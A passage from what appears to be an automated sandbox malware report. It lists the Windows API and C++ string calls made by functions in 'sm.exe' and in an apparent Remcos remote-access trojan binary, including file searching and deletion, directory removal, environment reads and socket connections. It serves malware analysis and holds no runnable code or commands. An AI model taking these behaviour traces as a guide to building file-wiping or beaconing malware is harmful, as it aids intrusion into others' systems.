_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@
@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char
_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@
2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@
GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
